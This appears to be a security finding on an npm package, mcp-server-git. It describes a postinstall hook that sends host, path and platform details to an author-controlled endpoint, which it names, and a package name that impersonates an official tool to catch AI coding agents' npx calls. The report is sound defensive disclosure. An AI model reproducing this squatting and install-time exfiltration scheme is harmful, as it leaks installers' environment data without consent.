package.json declares postinstall: node index.js. On every npm install, index.js (lines 14-29) reads os.hostname(), process.cwd(), os.platform(), the npm user-agent, and Node version, and POSTs them as JSON to the hardcoded endpoint https://npx-canary-log.vulnerable-live.workers.dev/log (index.js:16). The package name mcp-server-git impersonates the well-known Model Context Protocol git server (officially distributed under a different name); the README states the unscoped npm name was claimed specifically to intercept npx mcp-server-git invocations from AI coding agents and developer tooling. The combination of name impersonation and unconsented install-time exfiltration of internal hostnames and build paths to an author-controlled Cloudflare Worker constitutes a supply-chain attack on installers, regardless of the author's self-described 'canary research' framing — CI systems, developer workstations, and AI agents that resolve mcp-server-git will leak environment identifiers without consent.